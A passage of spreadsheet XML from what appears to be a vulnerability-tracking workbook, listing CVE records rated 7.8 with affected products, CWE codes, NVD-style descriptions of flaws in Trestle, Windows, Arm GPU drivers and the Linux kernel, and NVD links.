          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2085" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57170</t>
        </is>
      </c>
      <c r="C2085" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2085" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2085" s="5" t="inlineStr"/>
      <c r="F2085" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2085" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H2085" s="5" t="inlineStr"/>
      <c r="I2085" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J2085" s="5" t="inlineStr"/>
      <c r="K2085" s="5" t="inlineStr">
        <is>
          <t>CWE-1336, CWE-94</t>
        </is>
      </c>
      <c r="L2085" s="5" t="inlineStr">
        <is>
          <t>Compliance-trestle (Trestle) is a Python SDK and command-line tool for managing OSCAL compliance documents. In versions prior to 3.12.4 and 4.0.0 through 4.0.3, the custom Jinja2 include tags mdsection_include and md_clean_include re-parse the content of an included Markdown file as Jinja2 template code in a non-sandboxed environment, allowing server-side template injection that can lead to arbitrary code execution. The MDSectionInclude and MDCleanInclude tags in Trestle/core/jinja/tags.py pass included file content to Parser(self.environment, ...).parse(), splicing it into the host template's compilation, and the environment is a plain jinja2.Environment rather than a SandboxedEnvironment, so any expressions in the file are evaluated with full access to the usual SSTI gadget chain. Because Trestle's Markdown writers emit OSCAL prose and component-description fields verbatim, applying delimiter neutralization only to parameter tables, attacker-controlled OSCAL data such as a control statement, part prose, or component description containing Jinja2 syntax flows into an included Markdown file and is executed when the include tag re-parses it. This issue is fixed in version 4.1.0.</t>
        </is>
      </c>
      <c r="M2085" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57170</t>
        </is>
      </c>
    </row>
    <row r="2086">
      <c r="A2086" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2086" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-5729</t>
        </is>
      </c>
      <c r="C2086" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2086" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2086" s="5" t="inlineStr"/>
      <c r="F2086" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2086" s="5" t="inlineStr"/>
      <c r="H2086" s="5" t="inlineStr"/>
      <c r="I2086" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2086" s="5" t="inlineStr"/>
      <c r="K2086" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L2086" s="5" t="inlineStr">
        <is>
          <t>Use After Free vulnerability in Arm Ltd Valhall GPU Kernel Driver, Arm Ltd Arm 5th Gen GPU Architecture Kernel Driver allows a local non-privileged user process to perform valid GPU processing operations to access already freed memory.
This issue affects Valhall GPU Kernel Driver: from r50p0 through r54p3, r55p0; Arm 5th Gen GPU Architecture Kernel Driver: from r50p0 through r54p3, r55p0.</t>
        </is>
      </c>
      <c r="M2086" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-5729</t>
        </is>
      </c>
    </row>
    <row r="2087">
      <c r="A2087" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2087" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58097</t>
        </is>
      </c>
      <c r="C2087" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2087" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2087" s="5" t="inlineStr"/>
      <c r="F2087" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2087" s="5" t="inlineStr"/>
      <c r="H2087" s="5" t="inlineStr">
        <is>
          <t>freebsd:freebsd</t>
        </is>
      </c>
      <c r="I2087" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J2087" s="5" t="inlineStr"/>
      <c r="K2087" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-130</t>
        </is>
      </c>
      <c r="L2087" s="5" t="inlineStr">
        <is>
          <t>mp_SetEnddisc() copied a user-supplied PSN endpoint value without length validation, allowing a buffer overflow via the ppp(8) command interface.
A local user with access to the ppp(8) command interface can crash ppp(8) or potentially execute arbitrary code as root.</t>
        </is>
      </c>
      <c r="M2087" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58097</t>
        </is>
      </c>
    </row>
    <row r="2088">
      <c r="A2088" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2088" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58599</t>
        </is>
      </c>
      <c r="C2088" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2088" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2088" s="5" t="inlineStr"/>
      <c r="F2088" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2088" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H2088" s="5" t="inlineStr"/>
      <c r="I2088" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2088" s="5" t="inlineStr"/>
      <c r="K2088" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2088" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Windows Codecs Library allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M2088" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58599</t>
        </is>
      </c>
    </row>
    <row r="2089">
      <c r="A2089" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2089" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58600</t>
        </is>
      </c>
      <c r="C2089" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2089" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2089" s="5" t="inlineStr"/>
      <c r="F2089" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2089" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H2089" s="5" t="inlineStr"/>
      <c r="I2089" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2089" s="5" t="inlineStr"/>
      <c r="K2089" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2089" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Windows Codecs Library allows an unauthorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2089" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58600</t>
        </is>
      </c>
    </row>
    <row r="2090">
      <c r="A2090" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2090" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58611</t>
        </is>
      </c>
      <c r="C2090" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2090" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2090" s="5" t="inlineStr"/>
      <c r="F2090" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2090" s="5" t="inlineStr"/>
      <c r="H2090" s="5" t="inlineStr"/>
      <c r="I2090" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2090" s="5" t="inlineStr"/>
      <c r="K2090" s="5" t="inlineStr">
        <is>
          <t>CWE-285</t>
        </is>
      </c>
      <c r="L2090" s="5" t="inlineStr">
        <is>
          <t>Improper authorization in XBox Gaming Services allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2090" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58611</t>
        </is>
      </c>
    </row>
    <row r="2091">
      <c r="A2091" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2091" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58820</t>
        </is>
      </c>
      <c r="C2091" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2091" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2091" s="5" t="inlineStr"/>
      <c r="F2091" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2091" s="5" t="inlineStr"/>
      <c r="H2091" s="5" t="inlineStr"/>
      <c r="I2091" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2091" s="5" t="inlineStr"/>
      <c r="K2091" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2091" s="5" t="inlineStr">
        <is>
          <t>In multiple locations, there is a possible memory safety issue due to integer overflow. This could lead to local escalation of privilege with no additional execution privileges required.</t>
        </is>
      </c>
      <c r="M2091" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58820</t>
        </is>
      </c>
    </row>
    <row r="2092">
      <c r="A2092" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2092" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58823</t>
        </is>
      </c>
      <c r="C2092" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2092" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2092" s="5" t="inlineStr"/>
      <c r="F2092" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2092" s="5" t="inlineStr"/>
      <c r="H2092" s="5" t="inlineStr"/>
      <c r="I2092" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2092" s="5" t="inlineStr"/>
      <c r="K2092" s="5" t="inlineStr">
        <is>
          <t>CWE-120</t>
        </is>
      </c>
      <c r="L2092" s="5" t="inlineStr">
        <is>
          <t>In stpropnci_process_std of stpropnci_std.cc, there is a possible memory safety issue due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2092" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58823</t>
        </is>
      </c>
    </row>
    <row r="2093">
      <c r="A2093" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2093" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58839</t>
        </is>
      </c>
      <c r="C2093" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2093" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2093" s="5" t="inlineStr"/>
      <c r="F2093" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2093" s="5" t="inlineStr"/>
      <c r="H2093" s="5" t="inlineStr"/>
      <c r="I2093" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2093" s="5" t="inlineStr"/>
      <c r="K2093" s="5" t="inlineStr">
        <is>
          <t>CWE-120</t>
        </is>
      </c>
      <c r="L2093" s="5" t="inlineStr">
        <is>
          <t>In forEachLine of MountRegistry.cpp, there is a possible out of bounds read due to a buffer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2093" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58839</t>
        </is>
      </c>
    </row>
    <row r="2094">
      <c r="A2094" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2094" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58846</t>
        </is>
      </c>
      <c r="C2094" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2094" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2094" s="5" t="inlineStr"/>
      <c r="F2094" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2094" s="5" t="inlineStr"/>
      <c r="H2094" s="5" t="inlineStr"/>
      <c r="I2094" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2094" s="5" t="inlineStr"/>
      <c r="K2094" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="L2094" s="5" t="inlineStr">
        <is>
          <t>In kvm_iommu_map_sg of iommu.c, there is a possible use after free due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2094" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58846</t>
        </is>
      </c>
    </row>
    <row r="2095">
      <c r="A2095" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2095" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58874</t>
        </is>
      </c>
      <c r="C2095" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2095" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2095" s="5" t="inlineStr"/>
      <c r="F2095" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2095" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2095" s="5" t="inlineStr"/>
      <c r="I2095" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2095" s="5" t="inlineStr"/>
      <c r="K2095" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="L2095" s="5" t="inlineStr">
        <is>
          <t>In multiple functions of SmsController.java, there is a possible escalation of privilege due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2095" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58874</t>
        </is>
      </c>
    </row>
    <row r="2096">
      <c r="A2096" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2096" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58941</t>
        </is>
      </c>
      <c r="C2096" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2096" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2096" s="5" t="inlineStr"/>
      <c r="F2096" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2096" s="5" t="inlineStr"/>
      <c r="H2096" s="5" t="inlineStr"/>
      <c r="I2096" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2096" s="5" t="inlineStr"/>
      <c r="K2096" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L2096" s="5" t="inlineStr">
        <is>
          <t>In multiple functions of iommu.c, there is a possible out of bounds read/write due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2096" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58941</t>
        </is>
      </c>
    </row>
    <row r="2097">
      <c r="A2097" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2097" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62697</t>
        </is>
      </c>
      <c r="C2097" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2097" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2097" s="5" t="inlineStr"/>
      <c r="F2097" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2097" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2097" s="5" t="inlineStr"/>
      <c r="I2097" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2097" s="5" t="inlineStr"/>
      <c r="K2097" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L2097" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Push Notifications allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2097" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62697</t>
        </is>
      </c>
    </row>
    <row r="2098">
      <c r="A2098" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2098" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62804</t>
        </is>
      </c>
      <c r="C2098" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2098" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2098" s="5" t="inlineStr"/>
      <c r="F2098" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2098" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H2098" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I2098" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2098" s="5" t="inlineStr"/>
      <c r="K2098" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="L2098" s="5" t="inlineStr">
        <is>
          <t>External control of file name or path in Microsoft Office Word allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M2098" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62804</t>
        </is>
      </c>
    </row>
    <row r="2099">
      <c r="A2099" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2099" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62810</t>
        </is>
      </c>
      <c r="C2099" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2099" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2099" s="5" t="inlineStr"/>
      <c r="F2099" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2099" s="5" t="inlineStr">
        <is>
          <t>active directory</t>
        </is>
      </c>
      <c r="H2099" s="5" t="inlineStr"/>
      <c r="I2099" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2099" s="5" t="inlineStr"/>
      <c r="K2099" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2099" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Active Directory Certificate Services (AD CS) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2099" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62810</t>
        </is>
      </c>
    </row>
    <row r="2100">
      <c r="A2100" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2100" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62886</t>
        </is>
      </c>
      <c r="C2100" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2100" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2100" s="5" t="inlineStr"/>
      <c r="F2100" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2100" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows, .net</t>
        </is>
      </c>
      <c r="H2100" s="5" t="inlineStr">
        <is>
          <t>microsoft:.net, microsoft:visual_studio_2022, microsoft:visual_studio_2026, microsoft:windows</t>
        </is>
      </c>
      <c r="I2100" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J2100" s="5" t="inlineStr"/>
      <c r="K2100" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="L2100" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in .NET allows an unauthorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2100" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62886</t>
        </is>
      </c>
    </row>
    <row r="2101">
      <c r="A2101" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2101" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63622</t>
        </is>
      </c>
      <c r="C2101" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2101" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2101" s="5" t="inlineStr"/>
      <c r="F2101" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2101" s="5" t="inlineStr"/>
      <c r="H2101" s="5" t="inlineStr"/>
      <c r="I2101" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J2101" s="5" t="inlineStr"/>
      <c r="K2101" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="L2101" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in libvirt. A local attacker, specifically a process running as the confined `swtpm` user, could exploit a symlink-following vulnerability in the `virFileChownFiles()` function. By planting a symbolic link within the `swtpm` state directory, the attacker could trick the root-level libvirt daemon into changing the ownership of an arbitrary file to the `swtpm` user. This allows for privilege escalation from the `swtpm` sandbox to root-level file ownership control.</t>
        </is>
      </c>
      <c r="M2101" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63622</t>
        </is>
      </c>
    </row>
    <row r="2102">
      <c r="A2102" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2102" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64372</t>
        </is>
      </c>
      <c r="C2102" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2102" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2102" s="5" t="inlineStr"/>
      <c r="F2102" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2102" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H2102" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel</t>
        </is>
      </c>
      <c r="I2102" s="5" t="inlineStr">
        <is>
          <t>2026-07-25</t>
        </is>
      </c>
      <c r="J2102" s="5" t="inlineStr"/>
      <c r="K2102" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L2102" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
cpufreq: pcc: fix use-after-free and double free in _OSC evaluation
pcc_cpufreq_do_osc() calls acpi_evaluate_object() twice for the
two-phase _OSC negotiation. Between the two calls it freed
output.pointer but left output.length unchanged. Since
acpi_evaluate_object() treats a non-zero length with a non-NULL
pointer as an existing buffer to write into, the second call wrote
into freed memory (use-after-free). The subsequent kfree(output.pointer)
at out_free then freed the same pointer a second time (double free).
Reset output.pointer to NULL and output.length to ACPI_ALLOCATE_BUFFER
after freeing the first result, so ACPICA allocates a fresh buffer for
each phase independently.</t>
        </is>
      </c>
      <c r="M2102" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64372</t>
        </is>
      </c>
    </row>
    <row r="2103">
      <c r="A2103" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2103" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64375</t>
        </is>
      </c>
      <c r="C2103" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2103" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2103" s="5" t="inlineStr"/>
      <c r="F2103" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2103" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H2103" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel</t>
        </is>
      </c>
      <c r="I2103" s="5" t="inlineStr">
        <is>
          <t>2026-07-25</t>
        </is>
      </c>
      <c r="J2103" s="5" t="inlineStr"/>
      <c r="K2103" s="5" t="inlineStr"/>
      <c r="L2103" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
proc: protect ptrace_may_access() with exec_update_lock (FD links)
proc_pid_get_link() and proc_pid_readlink() currently look up the task from
the pid once, then do the ptrace access check on that task, then look up
the task from the pid a second time to do the actual access.
That's racy in several ways.
To fix it, pass the task to the -&gt;proc_get_link() handler, and instead of
proc_fd_access_allowed(), introduce a new helper call_proc_get_link() that
looks up and locks the task, does the access check, and calls
-&gt;proc_get_link().</t>
        </is>
      </c>
      <c r="M2103" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64375</t>
        </is>
      </c>
    </row>
    <row r="2104">
      <c r="A2104" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2104" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64377</t>
        </is>
      </c>
      <c r="C2104" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2104" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2104" s="5" t="inlineStr"/>
      <c r="F2104" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2104" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H2104" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel</t>
        </is>
      </c>
      <c r="I2104" s="5" t="inlineStr">
        <is>
          <t>2026-07-25</t>
        </is>
      </c>
      <c r="J2104" s="5" t="inlineStr"/>
      <c r="K2104" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="L2104" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
cpufreq: qcom-cpufreq-hw: Fix possible double free
qcom_cpufreq.data is allocated with devm_kzalloc() in probe() as an
array of per-domain data. qcom_cpufreq_hw_cpu_init() stores a pointer to
one element of this array in policy-&gt;driver_data.
qcom_cpufreq_hw_cpu_exit() currently calls kfree() on policy-&gt;driver_data.
This is not valid because the memory is devm-managed. For the first
domain, this can free the devm-managed allocation while the devres entry
is still active, leading to a possible double free when the platform
device is later detached. For other domains, the pointer may refer to an
element inside the array rather than the allocation base.
Remove the kfree(data) call and let devres release qcom_cpufreq.data.
This issue was found by a static analysis tool I am developing.</t>
        </is>
      </c>
      <c r="M2104" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64377</t>
        </is>
      </c>
    </row>
    <row r="2105">
      <c r="A2105" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2105" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64378</t>
        </is>
      </c>
      <c r="C2105" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2105" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2105" s="5" t="inlineStr"/>
      <c r="F2105" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2105" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H2105" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel</t>
        </is>
      </c>
      <c r="I2105" s="5" t="inlineStr">
        <is>
          <t>2026-07-25</t>
        </is>
      </c>
      <c r="J2105" s="5" t="inlineStr"/>
      <c r="K2105" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="L2105" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
writeback: fix race between cgroup_writeback_umount() and inode_switch_wbs()
When a container exits, the following BUG_ON() is occasionally triggered:
==================================================================
 VFS: Busy inodes after unmount of sdb (ext4)
 ------------[ cut here ]------------
 kernel BUG at fs/super.c:695!
 CPU: 3 PID: 6 Comm: containerd-shim Tainted: G OE K 6.6 #1
 pstate: 63400009 (nZCv daif +PAN -UAO +TCO +DIT -SSBS BTYPE=--)
 pc : generic_shutdown_super+0xf0/0x100
 lr : generic_shutdown_super+0xf0/0x100
 Call trace:
  generic_shutdown_super+0xf0/0x100
  kill_block_super+0x20/0x48
  ext4_kill_sb+0x28/0x60
  deactivate_locked_super+0x54/0x130
  deactivate_super+0x84/0xa0
  cleanup_mnt+0xa4/0x140
  __cleanup_mnt+0x18/0x28
  task_work_run+0x78/0xe0
  do_notify_resume+0x204/0x240
==================================================================
The root cause is a race between cgroup_writeback_umount() and
inode_switch_wbs()/cleanup_offline_cgwb(). There is a window between
inode_prepare_wbs_switch() returning true and the subsequent
